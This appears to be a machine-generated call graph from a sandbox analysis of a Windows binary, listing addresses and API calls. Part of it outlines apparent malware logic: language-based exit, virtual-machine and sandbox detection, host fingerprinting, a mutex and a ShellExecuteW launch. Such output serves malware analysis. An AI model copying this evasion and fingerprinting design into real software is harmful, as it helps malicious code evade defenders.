11046 8f152a 11045->11046 11048 8f1573 VirtualFree 11046->11048 11046->11051 11053 8f1593 VirtualProtect 11046->11053 11047 8f142f GetModuleHandleA GetProcAddress LoadLibraryA 11047->11049 11048->11046 11049->11044 11049->11047 11050 8f1490 11049->11050 11050->11049 11052 8f14d5 GetProcAddress 11050->11052 11051->11042 11052->11050 11053->11051 11055->10655 11057 8f8347 11056->11057 11058 8f8341 11056->11058 11081 8f834d SetLastError 11057->11081 11099 8fa65c 11057->11099 11094 8fa61d 11058->11094 11065 8f837d 11070 8fa65c __dosmaperr 6 API calls 11065->11070 11066 8f8394 11069 8fa65c __dosmaperr 6 API calls 11066->11069 11067 8f7d9b 11083 8f7dc6 11067->11083 11068 8f83e1 11071 8f7dc6 CallUnexpected 64 API calls 11068->11071 11073 8f83a0 11069->11073 11074 8f838b 11070->11074 11072 8f83e6 11071->11072 11075 8f83b5 11073->11075 11076 8f83a4 11073->11076 11111 8f7fb2 11074->11111 11117 8f8158 11075->11117 11077 8fa65c __dosmaperr 6 API calls 11076->11077 11077->11074 11081->11067 11081->11068 11082 8f7fb2 _free 14 API calls 11082->11081 11280 8fa9c7 11083->11280 11086 8f7dd6 11088 8f7de0 IsProcessorFeaturePresent 11086->11088 11093 8f7dff 11086->11093 11090 8f7dec 11088->11090 11089 8f76a7 _unexpected 23 API calls 11091 8f7e09 11089->11091 11092 8f695b _unexpected 8 API calls 11090->11092 11092->11093 11093->11089 11122 8fa4dc 11094->11122 11096 8fa639 11097 8fa654 TlsGetValue 11096->11097 11098 8fa642 11096->11098 11098->11057 11100 8fa4dc __dosmaperr 5 API calls 11099->11100 11101 8fa678 11100->11101 11102 8fa696 TlsSetValue 11101->11102 11103 8f8365 11101->11103 11103->11081 11104 8f8830 11103->11104 11109 8f883d __dosmaperr 11104->11109 11105 8f887d 11135 8f881d 11105->11135 11106 8f8868 HeapAlloc 11108 8f8375 11106->11108 11106->11109 11108->11065 11108->11066 11109->11105 11109->11106 11110 8f6b82 _Allocate 2 API calls 11109->11110 11110->11109 11112 8f7fbd HeapFree 11111->11112 11113 8f7fe6 __dosmaperr 11111->11113 11112->11113 11114 8f7fd2 11112->11114 11113->11081 11115 8f881d __dosmaperr 12 API calls 11114->11115 11116 8f7fd8 GetLastError 11115->11116 11116->11113 11138 8f7fec 11117->11138 11123 8fa50a 11122->11123 11127 8fa506 __dosmaperr 11122->11127 11123->11127 11128 8fa415 11123->11128 11126 8fa524 GetProcAddress 11126->11127 11127->11096 11133 8fa426 11128->11133 11129 8fa4d1 11129->11126 11129->11127 11130 8fa444 LoadLibraryExW 11131 8fa45f GetLastError 11130->11131 11130->11133 11131->11133 11132 8fa4ba FreeLibrary 11132->11133 11133->11129 11133->11130 11133->11132 11134 8fa492 LoadLibraryExW 11133->11134 11134->11133 11136 8f8481 __dosmaperr 14 API calls 11135->11136 11137 8f8822 11136->11137 11137->11108 11139 8f7ff8 ___scrt_is_nonwritable_in_current_image 11138->11139 11152 8f860b EnterCriticalSection 11139->11152 11141 8f8002 11153 8f8032 11141->11153 11144 8f80fe 11145 8f810a ___scrt_is_nonwritable_in_current_image 11144->11145 11157 8f860b EnterCriticalSection 11145->11157 11147 8f8114 11158 8f82df 11147->11158 11149 8f812c 11162 8f814c 11149->11162 11152->11141 11156 8f8653 LeaveCriticalSection 11153->11156 11155 8f8020 11155->11144 11156->11155 11157->11147 11159 8f82ee __dosmaperr 11158->11159 11160 8f8315 __dosmaperr 11158->11160 11159->11160 11165 8fa0c4 11159->11165 11160->11149 11279 8f8653 LeaveCriticalSection 11162->11279 11164 8f813a 11164->11082 11167 8fa144 11165->11167 11168 8fa0da 11165->11168 11169 8f7fb2 _free 14 API calls 11167->11169 11191 8fa192 11167->11191 11168->11167 11173 8f7fb2 _free 14 API calls 11168->11173 11188 8fa10d 11168->11188 11170 8fa166 11169->11170 11171 8f7fb2 _free 14 API calls 11170->11171 11174 8fa179 11171->11174 11172 8f7fb2 _free 14 API calls 11177 8fa139 11172->11177 11179 8fa102 11173->11179 11176 8f7fb2 _free 14 API calls 11174->11176 11175 8f7fb2 _free 14 API calls 11180 8fa124 11175->11180 11181 8fa187 11176->11181 11182 8f7fb2 _free 14 API calls 11177->11182 11178 8fa200 11183 8f7fb2 _free 14 API calls 11178->11183 11193 8f9c2f 11179->11193 11221 8f9d2d 11180->11221 11186 8f7fb2 _free 14 API calls 11181->11186 11182->11167 11187 8fa206 11183->11187 11186->11191 11187->11160 11188->11175 11190 8fa12f 11188->11190 11189 8fa1a0 11189->11178 11192 8f7fb2 14 API calls _free 11189->11192 11190->11172 11233 8fa235 11191->11233 11192->11189 11194 8f9c40 11193->11194 11220 8f9d29 11193->11220 11195 8f9c51 11194->11195 11196 8f7fb2 _free 14 API calls 11194->11196 11197 8f9c63 11195->11197 11198 8f7fb2 _free 14 API calls 11195->11198 11196->11195 11199 8f9c75 11197->11199 11200 8f7fb2 _free 14 API calls 11197->11200 11198->11197 11201 8f7fb2 _free 14 API calls 11199->11201 11205 8f9c87 11199->11205 11200->11199 11201->11205 11202 8f7fb2 _free 14 API calls 11204 8f9c99 11202->11204 11203 8f9cab 11207 8f9cbd 11203->11207 11208 8f7fb2 _free 14 API calls 11203->11208 11204->11203 11206 8f7fb2 _free 14 API calls 11204->11206 11205->11202 11205->11204 11206->11203 11209 8f9ccf 11207->11209 11211 8f7fb2 _free 14 API calls 11207->11211 11208->11207 11210 8f9ce1 11209->11210 11212 8f7fb2 _free 14 API calls 11209->11212 11213 8f9cf3 11210->11213 11214 8f7fb2 _free 14 API calls 11210->11214 11211->11209 11212->11210 11215 8f9d05 11213->11215 11216 8f7fb2 _free 14 API calls 11213->11216 11214->11213 11217 8f9d17 11215->11217 11218 8f7fb2 _free 14 API calls 11215->11218 11216->11215 11219 8f7fb2 _free 14 API calls 11217->11219 11217->11220 11218->11217 11219->11220 11220->11188 11222 8f9d3a 11221->11222 11232 8f9d92 11221->11232 11223 8f7fb2 _free 14 API calls 11222->11223 11225 8f9d4a 11222->11225 11223->11225 11224 8f9d5c 11227 8f9d6e 11224->11227 11228 8f7fb2 _free 14 API calls 11224->11228 11225->11224 11226 8f7fb2 _free 14 API calls 11225->11226 11226->11224 11229 8f9d80 11227->11229 11230 8f7fb2 _free 14 API calls 11227->11230 11228->11227 11231 8f7fb2 _free 14 API calls 11229->11231 11229->11232 11230->11229 11231->11232 11232->11190 11234 8fa261 11233->11234 11235 8fa242 11233->11235 11234->11189 11235->11234 11239 8f9dce 11235->11239 11238 8f7fb2 _free 14 API calls 11238->11234 11240 8f9ddf 11239->11240 11274 8f9eac 11239->11274 11275 8f9d96 11240->11275 11243 8f9d96 __dosmaperr 14 API calls 11244 8f9df2 11243->11244 11245 8f9d96 __dosmaperr 14 API calls 11244->11245 11246 8f9dfd 11245->11246 11247 8f9d96 __dosmaperr 14 API calls 11246->11247 11248 8f9e08 11247->11248 11249 8f9d96 __dosmaperr 14 API calls 11248->11249 11250 8f9e16 11249->11250 11251 8f7fb2 _free 14 API calls 11250->11251 11252 8f9e21 11251->11252 11253 8f7fb2 _free 14 API calls 11252->11253 11254 8f9e2c 11253->11254 11255 8f7fb2 _free 14 API calls 11254->11255 11256 8f9e37 11255->11256 11257 8f9d96 __dosmaperr 14 API calls 11256->11257 11258 8f9e45 11257->11258 11259 8f9d96 __dosmaperr 14 API calls 11258->11259 11260 8f9e53 11259->11260 11261 8f9d96 __dosmaperr 14 API calls 11260->11261 11262 8f9e64 11261->11262 11263 8f9d96 __dosmaperr 14 API calls 11262->11263 11264 8f9e72 11263->11264 11265 8f9d96 __dosmaperr 14 API calls 11264->11265 11266 8f9e80 11265->11266 11267 8f7fb2 _free 14 API calls 11266->11267 11268 8f9e8b 11267->11268 11269 8f7fb2 _free 14 API calls 11268->11269 11270 8f9e96 11269->11270 11271 8f7fb2 _free 14 API calls 11270->11271 11272 8f9ea1 11271->11272 11273 8f7fb2 _free 14 API calls 11272->11273 11273->11274 11274->11238 11276 8f9dc9 11275->11276 11277 8f9db9 11275->11277 11276->11243 11277->11276 11278 8f7fb2 _free 14 API calls 11277->11278 11278->11277 11279->11164 11316 8fa8f9 11280->11316 11283 8faa0c 11284 8faa18 ___scrt_is_nonwritable_in_current_image 11283->11284 11285 8f8481 __dosmaperr 14 API calls 11284->11285 11289 8faa45 _unexpected 11284->11289 11290 8faa3f _unexpected 11284->11290 11285->11290 11286 8faa8c 11287 8f881d __dosmaperr 14 API calls 11286->11287 11288 8faa91 11287->11288 11327 8f6b07 11288->11327 11292 8faab8 11289->11292 11330 8f860b EnterCriticalSection 11289->11330 11290->11286 11290->11289 11310 8faa76 11290->11310 11295 8fabeb 11292->11295 11296 8faafa 11292->11296 11306 8fab29 11292->11306 11298 8fabf6 11295->11298 11335 8f8653 LeaveCriticalSection 11295->11335 11301 8f832a _unexpected 66 API calls 11296->11301 11296->11306 11300 8f76a7 _unexpected 23 API calls 11298->11300 11305 8fabfe ___scrt_is_nonwritable_in_current_image 11300->11305 11303 8fab1e 11301->11303 11302 8f832a _unexpected 66 API calls 11308 8fab7e 11302->11308 11304 8f832a _unexpected 66 API calls 11303->11304 11304->11306 11336 8fafa6 EnterCriticalSection 11305->11336 11331 8fab98 11306->11331 11309 8f832a _unexpected 66 API calls 11308->11309 11308->11310 11309->11310 11310->11086 11311 8fac15 _unexpected 11312 8fac4e 11311->11312 11337 8fae41 11311->11337 11347 8fac7f 11312->11347 11317 8fa905 ___scrt_is_nonwritable_in_current_image 11316->11317 11322 8f860b EnterCriticalSection 11317->11322 11319 8fa913 11323 8fa951 11319->11323 11322->11319 11326 8f8653 LeaveCriticalSection 11323->11326 11325 8f7dcb 11325->11086 11325->11283 11326->11325 11328 8f6aa3 ___std_exception_copy 25 API calls 11327->11328 11329 8f6b13 11328->11329 11329->11310 11330->11292 11332 8fab9e 11331->11332 11334 8fab6f 11331->11334 11350 8f8653 LeaveCriticalSection 11332->11350 11334->11302 11334->11308 11334->11310 11335->11298 11336->11311 11338 8fae4e 11337->11338 11339 8fae57 11337->11339 11351 8fad37 11338->11351 11354 8faddc 11339->11354 11344 8fae73 11367 8fbf7b 11344->11367 11346 8fae54 11346->11312 11604 8fafba LeaveCriticalSection 11347->11604 11349 8fac6d 11349->11086 11350->11334 11378 8fac8b 11351->11378 11355 8fae19 11354->11355 11356 8fadf4 11354->11356 11355->11346 11360 8fb5ca 11355->11360 11356->11355 11357 8fb5ca _unexpected 25 API calls 11356->11357 11358 8fae12 11357->11358 11400 8fc773 11358->11400 11361 8fb5eb 11360->11361 11362 8fb5d6 11360->11362 11361->11344 11363 8f881d __dosmaperr 14 API calls 11362->11363 11364 8fb5db 11363->11364 11365 8f6b07 ___std_exception_copy 25 API calls 11364->11365 11366 8fb5e6 11365->11366 11366->11344 11368 8fbf8c 11367->11368 11369 8fbf99 11367->11369 11370 8f881d __dosmaperr 14 API calls 11368->11370 11371 8fbfe2 11369->11371 11375 8fbfc0 11369->11375 11373 8fbf91 11370->11373 11372 8f881d __dosmaperr 14 API calls 11371->11372 11374 8fbfe7 11372->11374 11373->11346 11376 8f6b07 ___std_exception_copy 25 API calls 11374->11376 11585 8fbed9 11375->11585 11376->11373 11379 8fac97 ___scrt_is_nonwritable_in_current_image 11378->11379 11386 8f860b EnterCriticalSection 11379->11386 11381 8fad0d 11395 8fad2b 11381->11395 11382 8faca1 _unexpected 11382->11381 11387 8fabff 11382->11387 11386->11382 11388 8fac0b ___scrt_is_nonwritable_in_current_image 11387->11388 11398 8fafa6 EnterCriticalSection 11388->11398 11390 8fac15 _unexpected 11391 8fac4e 11390->11391 11393 8fae41 _unexpected 66 API calls 11390->11393 11392 8fac7f _unexpected LeaveCriticalSection 11391->11392 11394 8fac6d 11392->11394 11393->11391 11394->11382 11399 8f8653 LeaveCriticalSection 11395->11399 11397 8fad19 11397->11346 11398->11390 11399->11397 11401 8fc77f ___scrt_is_nonwritable_in_current_image 11400->11401 11402 8fc79f 11401->11402 11403 8fc787 11401->11403 11404 8fc83a 11402->11404 11410 8fc7d1 11402->11410 11425 8f880a 11403->11425 11406 8f880a __dosmaperr 14 API calls 11404->11406 11409 8fc83f 11406->11409 11408 8f881d __dosmaperr 14 API calls 11424 8fc794 11408->11424 11411 8f881d __dosmaperr 14 API calls 11409->11411 11428 8f98e2 EnterCriticalSection 11410->11428 11413 8fc847 11411->11413 11415 8f6b07 ___std_exception_copy 25 API calls 11413->11415 11414 8fc7d7 11416 8fc808 11414->11416 11417 8fc7f3 11414->11417 11415->11424 11429 8fc865 11416->11429 11418 8f881d __dosmaperr 14 API calls 11417->11418 11420 8fc7f8 11418->11420 11422 8f880a __dosmaperr 14 API calls 11420->11422 11421 8fc803 11471 8fc832 11421->11471 11422->11421 11424->11355 11426 8f8481 __dosmaperr 14 API calls 11425->11426 11427 8f880f 11426->11427 11427->11408 11428->11414 11430 8fc887 11429->11430 11466 8fc8a3 11429->11466 11431 8fc88b 11430->11431 11433 8fc8db 11430->11433 11432 8f880a __dosmaperr 14 API calls 11431->11432 11434 8fc890 11432->11434 11435 8fc8f1 11433->11435 11474 8fcefc 11433->11474 11436 8f881d __dosmaperr 14 API calls 11434->11436 11477 8fc40c 11435->11477 11439 8fc898 11436->11439 11440 8f6b07 ___std_exception_copy 25 API calls 11439->11440 11440->11466 11442 8fc8ff 11446 8fc925 11442->11446 11447 8fc903 11442->11447 11443 8fc938 11444 8fc94c 11443->11444 11445 8fc992 WriteFile 11443->11445 11450 8fc954 11444->11450 11451 8fc982 11444->11451 11448 8fc9b5 GetLastError 11445->11448 11455 8fc91b 11445->11455 11489 8fbff8 GetConsoleOutputCP 11446->11489 11452 8fc9ff 11447->11452 11484 8fc3a4 11447->11484 11448->11455 11456 8fc959 11450->11456 11457 8fc972 11450->11457 11517 8fc47d 11451->11517 11458 8f881d __dosmaperr 14 API calls 11452->11458 11452->11466 11455->11452 11461 8fc9d5 11455->11461 11455->11466 11456->11452 11502 8fc558 11456->11502 11509 8fc641 11457->11509 11460 8fca20 11458->11460 11463 8f880a __dosmaperr 14 API calls 11460->11463 11464 8fc9dc 11461->11464 11465 8fc9f3 11461->11465 11463->11466 11467 8f881d __dosmaperr 14 API calls 11464->11467 11524 8f87e7 11465->11524 11466->11421 11469 8fc9e1 11467->11469 11470 8f880a __dosmaperr 14 API calls 11469->11470 11470->11466 11584 8f9905 LeaveCriticalSection 11471->11584 11473 8fc838 11473->11424 11529 8fce80 11474->11529 11551 8fcb2a 11477->11551 11479 8fc41d 11480 8f832a _unexpected 65 API calls 11479->11480 11483 8fc473 11479->11483 11481 8fc440 11480->11481 11482 8fc45a GetConsoleMode 11481->11482 11481->11483 11482->11483 11483->11442 11483->11443 11485 8fc3c6 11484->11485 11488 8fc3fb 11484->11488 11486 8fc3fd GetLastError 11485->11486 11487 8fcf17 5 API calls _unexpected 11485->11487 11485->11488 11486->11488 11487->11485 11488->11455 11560 8f7e6f 11489->11560 11491 8fc054 __InternalCxxFrameHandler 11495 8fb556 62 API calls __fassign 11491->11495 11496 8fc2fa 11491->11496 11498 8fc27d WriteFile 11491->11498 11500 8fcd4a 19 API calls _unexpected 11491->11500 11501 8fc2b5 WriteFile 11491->11501 11568 8f9eb2 11491->11568 11573 8f9625 11491->11573 11493 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11494 8fc3a2 11493->11494 11494->11455 11495->11491 11496->11493 11496->11496 11498->11491 11499 8fc372 GetLastError 11498->11499 11499->11496 11500->11491 11501->11491 11501->11499 11507 8fc567 _unexpected 11502->11507 11503 8fc626 11504 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11503->11504 11506 8fc63f 11504->11506 11505 8fc5dc WriteFile 11505->11507 11508 8fc628 GetLastError 11505->11508 11506->11455 11507->11503 11507->11505 11508->11503 11510 8fc650 _unexpected 11509->11510 11513 8f9625 _unexpected WideCharToMultiByte 11510->11513 11514 8fc75a GetLastError 11510->11514 11515 8fc70f WriteFile 11510->11515 11516 8fc758 11510->11516 11511 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11512 8fc771 11511->11512 11512->11455 11513->11510 11514->11516 11515->11510 11515->11514 11516->11511 11522 8fc48c _unexpected 11517->11522 11518 8fc53d 11519 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11518->11519 11520 8fc556 11519->11520 11520->11455 11521 8fc4fc WriteFile 11521->11522 11523 8fc53f GetLastError 11521->11523 11522->11518 11522->11521 11523->11518 11525 8f880a __dosmaperr 14 API calls 11524->11525 11526 8f87f2 __dosmaperr 11525->11526 11527 8f881d __dosmaperr 14 API calls 11526->11527 11528 8f8805 11527->11528 11528->11466 11538 8f99b9 11529->11538 11531 8fce92 11532 8fceab SetFilePointerEx 11531->11532 11533 8fce9a 11531->11533 11535 8fcec3 GetLastError 11532->11535 11536 8fce9f 11532->11536 11534 8f881d __dosmaperr 14 API calls 11533->11534 11534->11536 11537 8f87e7 __dosmaperr 14 API calls 11535->11537 11536->11435 11537->11536 11539 8f99c6 11538->11539 11541 8f99db 11538->11541 11540 8f880a __dosmaperr 14 API calls 11539->11540 11543 8f99cb 11540->11543 11542 8f880a __dosmaperr 14 API calls 11541->11542 11545 8f9a00 11541->11545 11546 8f9a0b 11542->11546 11544 8f881d __dosmaperr 14 API calls 11543->11544 11547 8f99d3 11544->11547 11545->11531 11548 8f881d __dosmaperr 14 API calls 11546->11548 11547->11531 11549 8f9a13 11548->11549 11550 8f6b07 ___std_exception_copy 25 API calls 11549->11550 11550->11547 11552 8fcb37 11551->11552 11554 8fcb44 11551->11554 11553 8f881d __dosmaperr 14 API calls 11552->11553 11555 8fcb3c 11553->11555 11556 8fcb50 11554->11556 11557 8f881d __dosmaperr 14 API calls 11554->11557 11555->11479 11556->11479 11558 8fcb71 11557->11558 11559 8f6b07 ___std_exception_copy 25 API calls 11558->11559 11559->11555 11561 8f7e8f 11560->11561 11562 8f7e86 11560->11562 11561->11562 11563 8f832a _unexpected 66 API calls 11561->11563 11562->11491 11564 8f7eaf 11563->11564 11576 8fb570 11564->11576 11569 8f832a _unexpected 66 API calls 11568->11569 11570 8f9ebd 11569->11570 11571 8fb570 __fassign 66 API calls 11570->11571 11572 8f9ecd 11571->11572 11572->11491 11575 8f963c WideCharToMultiByte 11573->11575 11575->11491 11577 8f7ec5 11576->11577 11578 8fb583 11576->11578 11580 8fb59d 11577->11580 11578->11577 11579 8fa310 __fassign 66 API calls 11578->11579 11579->11577 11581 8fb5c5 11580->11581 11582 8fb5b0 11580->11582 11581->11562 11582->11581 11583 8f9309 __fassign 66 API calls 11582->11583 11583->11581 11584->11473 11586 8fbee5 ___scrt_is_nonwritable_in_current_image 11585->11586 11599 8f98e2 EnterCriticalSection 11586->11599 11588 8fbef4 11589 8fbf3b 11588->11589 11590 8f99b9 _unexpected 25 API calls 11588->11590 11591 8f881d __dosmaperr 14 API calls 11589->11591 11592 8fbf20 FlushFileBuffers 11590->11592 11593 8fbf40 11591->11593 11592->11593 11594 8fbf2c 11592->11594 11600 8fbf6f 11593->11600 11596 8f880a __dosmaperr 14 API calls 11594->11596 11598 8fbf31 GetLastError 11596->11598 11598->11589 11599->11588 11603 8f9905 LeaveCriticalSection 11600->11603 11602 8fbf58 11602->11373 11603->11602 11604->11349 11606 8f754c 11605->11606 11614 8f755d 11605->11614 11616 8f75e4 GetModuleHandleW 11606->11616 11611 8f7597 11611->10424 11623 8f7404 11614->11623 11617 8f7551 11616->11617 11617->11614 11618 8f7627 GetModuleHandleExW 11617->11618 11619 8f765b 11618->11619 11620 8f7646 GetProcAddress 11618->11620 11621 8f766f FreeLibrary 11619->11621 11622 8f7678 11619->11622 11620->11619 11621->11622 11622->11614 11624 8f7410 ___scrt_is_nonwritable_in_current_image 11623->11624 11639 8f860b EnterCriticalSection 11624->11639 11626 8f741a 11640 8f7451 11626->11640 11628 8f7427 11644 8f7445 11628->11644 11631 8f75a2 11668 8f9763 GetPEB 11631->11668 11634 8f75d1 11637 8f7627 _unexpected 3 API calls 11634->11637 11635 8f75b1 GetPEB 11635->11634 11636 8f75c1 GetCurrentProcess TerminateProcess 11635->11636 11636->11634 11638 8f75d9 ExitProcess 11637->11638 11639->11626 11642 8f745d ___scrt_is_nonwritable_in_current_image 11640->11642 11641 8f74be _unexpected 11641->11628 11642->11641 11647 8f7b65 11642->11647 11667 8f8653 LeaveCriticalSection 11644->11667 11646 8f7433 11646->11611 11646->11631 11650 8f7896 11647->11650 11651 8f78a2 ___scrt_is_nonwritable_in_current_image 11650->11651 11658 8f860b EnterCriticalSection 11651->11658 11653 8f78b0 11659 8f7a75 11653->11659 11658->11653 11661 8f78bd 11659->11661 11662 8f7a94 11659->11662 11660 8f7fb2 _free 14 API calls 11660->11661 11663 8f78e5 11661->11663 11662->11660 11662->11661 11666 8f8653 LeaveCriticalSection 11663->11666 11665 8f78ce 11665->11641 11666->11665 11667->11646 11669 8f977d 11668->11669 11670 8f75ac 11668->11670 11672 8fa55f 11669->11672 11670->11634 11670->11635 11673 8fa4dc __dosmaperr 5 API calls 11672->11673 11674 8fa57b 11673->11674 11674->11670 11676 8f7d06 11675->11676 11678 8f7d18 ___scrt_uninitialize_crt 11675->11678 11677 8f7d14 11676->11677 11680 8fae89 11676->11680 11677->10469 11678->10469 11681 8fad37 ___scrt_uninitialize_crt 66 API calls 11680->11681 11682 8fae90 11681->11682 11682->11677 11683 2b88e00 GetUserDefaultLangID 11684 2b88eac ExitProcess 11683->11684 11685 2b88e1d 11683->11685 11685->11684 11699 2b885f0 11685->11699 11687 2b88e8a 11687->11684 11688 2b88e8e 11687->11688 11783 2b88310 InitializeCriticalSection 11688->11783 11690 2b88e93 11793 2b87120 ExpandEnvironmentStringsW lstrlenW 11690->11793 11692 2b88e98 11800 2b88f70 CryptGenRandom 11692->11800 11698 2b88ea7 11698->11684 11700 2b885fd 11699->11700 11701 2b88612 EnumDisplayDevicesW 11700->11701 11702 2b886aa GetModuleHandleA GetProcAddress GetProcAddress 11701->11702 11703 2b8863a 11701->11703 11704 2b886e0 11702->11704 11705 2b886e6 ExpandEnvironmentStringsW ExpandEnvironmentStringsW GetFileAttributesW 11702->11705 11706 2b88640 StrStrIW 11703->11706 11704->11705 11707 2b8874e SHGetFolderPathW SHGetFolderPathW PathCombineW GetFileAttributesW 11705->11707 11708 2b88726 11705->11708 11709 2b88745 11706->11709 11710 2b88657 StrStrIW 11706->11710 11719 2b887a6 11707->11719 11708->11707 11711 2b8872a GetFileAttributesW 11708->11711 11709->11687 11710->11709 11713 2b8866d StrStrIW 11710->11713 11711->11707 11714 2b88738 11711->11714 11713->11709 11715 2b88683 StrStrIW 11713->11715 11714->11707 11717 2b8873c 11714->11717 11715->11709 11718 2b88699 EnumDisplayDevicesW 11715->11718 11716 2b887d5 PathCombineW GetFileAttributesW 11716->11719 11717->11709 11718->11702 11718->11706 11719->11709 11719->11716 11720 2b88819 11719->11720 11720->11709 11721 2b88828 PathCombineW PathCombineW GetFileAttributesW 11720->11721 11722 2b889ee PathCombineW GetFileAttributesW 11721->11722 11723 2b88870 11721->11723 11725 2b88ad9 ExpandEnvironmentStringsW GetFileAttributesW 11722->11725 11726 2b88a19 11722->11726 11723->11722 11724 2b88878 GetFileAttributesW 11723->11724 11724->11722 11728 2b8888a 11724->11728 11727 2b88afe 11725->11727 11726->11725 11729 2b88a21 CreateFileW 11726->11729 11737 2b88b0c GetFileAttributesExW 11727->11737 11738 2b88b2d GetComputerNameW GetUserNameW 11727->11738 11728->11722 11730 2b88892 CreateFileW 11728->11730 11731 2b88a4f GetFileSize GetProcessHeap HeapAlloc 11729->11731 11732 2b88a92 11729->11732 11739 2b888cd GetFileSize GetProcessHeap HeapAlloc 11730->11739 11740 2b8890e CreateFileW 11730->11740 11733 2b88a89 CloseHandle 11731->11733 11734 2b88a70 ReadFile 11731->11734 11735 2b88abb 11732->11735 11736 2b88a9c lstrcmpA 11732->11736 11733->11732 11734->11733 11742 2b88acf 11735->11742 11743 2b88abf GetProcessHeap HeapFree 11735->11743 11736->11735 11737->11738 11744 2b88b23 11737->11744 11747 2b88b93 lstrcmpW 11738->11747 11745 2b888f0 ReadFile 11739->11745 11746 2b88907 CloseHandle 11739->11746 11741 2b88935 GetFileSize GetProcessHeap HeapAlloc 11740->11741 11752 2b88978 11740->11752 11749 2b8896f CloseHandle 11741->11749 11750 2b88956 ReadFile 11741->11750 11742->11709 11742->11725 11743->11742 11744->11709 11744->11738 11745->11746 11746->11740 11747->11709 11748 2b88bab 11747->11748 11748->11747 11753 2b88bb2 StrStrW 11748->11753 11749->11752 11750->11749 11751 2b889b9 11755 2b889d0 11751->11755 11756 2b889c0 GetProcessHeap HeapFree 11751->11756 11752->11751 11754 2b88988 lstrcmpA 11752->11754 11753->11709 11757 2b88bcc lstrcmpW 11753->11757 11754->11751 11758 2b8899a lstrcmpA 11754->11758 11759 2b889e4 11755->11759 11760 2b889d4 GetProcessHeap HeapFree 11755->11760 11756->11755 11761 2b88bde lstrcmpW 11757->11761 11762 2b88bf1 11757->11762 11758->11751 11759->11709 11759->11722 11760->11759 11761->11709 11761->11762 11763 2b88c10 lstrcmpW 11762->11763 11764 2b88c2c GlobalMemoryStatusEx 11762->11764 11763->11709 11763->11762 11764->11709 11765 2b88c5f lstrcmpW 11764->11765 11766 2b88c8c PathCombineW 11765->11766 11767 2b88c71 lstrcmpW 11765->11767 11769 2b88cb0 11766->11769 11767->11766 11768 2b88c80 11767->11768 11768->11709 11768->11766 11769->11769 11770 2b88cc0 FindFirstFileW 11769->11770 11771 2b88ce0 11770->11771 11772 2b88dd2 GetModuleFileNameW StrStrIW 11770->11772 11773 2b88cf0 lstrcmpW 11771->11773 11772->11687 11774 2b88da4 FindNextFileW 11773->11774 11775 2b88d06 lstrcmpW 11773->11775 11774->11773 11777 2b88dba FindClose 11774->11777 11775->11774 11776 2b88d1c lstrcmpW 11775->11776 11779 2b88d5b lstrcmpW 11776->11779 11780 2b88d67 lstrcmpW 11776->11780 11777->11709 11777->11772 11779->11780 11781 2b88d7f 11779->11781 11780->11781 11782 2b88d73 lstrcmpW 11780->11782 11781->11774 11782->11781 11784 2b88343 GetVolumeInformationW StringFromGUID2 wsprintfA CreateMutexW GetLastError 11783->11784 11840 2b86fe0 11783->11840 11786 2b883ff 11784->11786 11787 2b884f1 ExitProcess 11784->11787 11848 2b824f0 GetTickCount 11786->11848 11790 2b8844f CryptAcquireContextA 11790->11787 11791 2b8846f CoInitializeEx ExpandEnvironmentStringsW CreateFileW 11790->11791 11791->11690 11794 2b87154 ExpandEnvironmentStringsW 11793->11794 11795 2b87167 GetSystemWow64DirectoryW 11793->11795 11794->11795 11796 2b8717d GetLastError 11795->11796 11797 2b87183 wnsprintfW ExpandEnvironmentStringsW wnsprintfW 11795->11797 11796->11797 11850 2b86b90 VariantInit CoCreateInstance 11797->11850 11801 2b88fac 11800->11801 11886 2b82690 GetProcessHeap HeapAlloc 11801->11886 11804 2b88fee 11806 2b82690 2 API calls 11804->11806 11805 2b88fe2 GetProcessHeap HeapFree 11805->11804 11807 2b88ffd 11806->11807 11808 2b88e9d 11807->11808 11809 2b89006 wsprintfA 11807->11809 11813 2b87620 GetPEB LsaOpenPolicy 11808->11813 11810 2b89031 11809->11810 11812 2b8904f GetProcessHeap HeapFree GetProcessHeap HeapFree 11810->11812 11888 2b86670 ObtainUserAgentString MultiByteToWideChar 11810->11888 11812->11808 11814 2b876db GetComputerNameW GetUserNameW 11813->11814 11815 2b87666 LsaQueryInformationPolicy 11813->11815 11816 2b8772b 11814->11816 11817 2b87679 11815->11817 11818 2b876d2 LsaClose 11815->11818 11821 2b824f0 GetTickCount 11816->11821 11823 2b8775a 11816->11823 11819 2b876cb LsaFreeMemory 11817->11819 11820 2b87681 GetProcessHeap HeapAlloc 11817->11820 11818->11814 11819->11818 11822 2b8769e 11820->11822 11821->11816 11822->11819 11824 2b87769 wsprintfA wsprintfA 11823->11824 11825 2b877c6 11824->11825 11825->11825 11826 2b86670 32 API calls 11825->11826 11827 2b877fa 11826->11827 11828 2b8780d GetProcessHeap HeapFree 11827->11828 11829 2b87815 11827->11829 11828->11829 11830 2b87819 GetProcessHeap HeapFree 11829->11830 11831 2b87821 11829->11831 11830->11831 11832 2b88500 ExpandEnvironmentStringsW ExpandEnvironmentStringsW ExpandEnvironmentStringsW 11831->11832 11833 2b88550 11832->11833 11833->11833 11834 2b88560 GetFileAttributesW 11833->11834 11835 2b8857f GetFileAttributesW 11834->11835 11836 2b88574 11834->11836 11837 2b88578 11835->11837 11838 2b885a3 wnsprintfW ShellExecuteW 11835->11838 11836->11835 11836->11837 11837->11838 11839 2b88596 lstrcpyW 11837->11839 11838->11698 11839->11838 11841 2b86ff1 RegOpenKeyExW 11840->11841 11842 2b8706f 11841->11842 11843 2b87014 RegQueryValueExW 11841->11843 11842->11841 11847 2b87086 11842->11847 11844 2b87030 GetProcessHeap HeapAlloc 11843->11844 11845 2b87066 RegCloseKey 11843->11845 11844->11845 11846 2b8704c RegQueryValueExW 11844->11846 11845->11842 11846->11845 11847->11784 11849 2b82500 WSAStartup CryptAcquireContextA 11848->11849 11849->11790 11849->11791 11851 2b86beb 11850->11851 11857 2b86c3a 11850->11857 11854 2b86c1c SysAllocString 11851->11854 11851->11857 11852 2b86c5d SysFreeString 11853 2b86c60 11852->11853 11855 2b86c6a SysAllocString 11853->11855 11863 2b86fa8 SetFileAttributesW 11853->11863 11854->11857 11856 2b86c8d SysFreeString 11855->11856 11858 2b86cbd 11856->11858 11859 2b86c9d SysAllocString 